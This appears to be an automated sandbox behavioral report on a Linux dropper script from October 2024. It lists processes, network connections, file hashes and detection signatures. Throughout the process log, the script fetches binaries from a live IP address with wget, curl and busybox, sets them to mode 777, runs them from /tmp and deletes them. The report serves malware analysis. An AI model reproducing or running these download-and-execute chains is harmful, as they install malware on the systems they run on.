[curl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 02:12
Reported
2024-10-28 02:14
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
12s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
Processes
/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
[/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
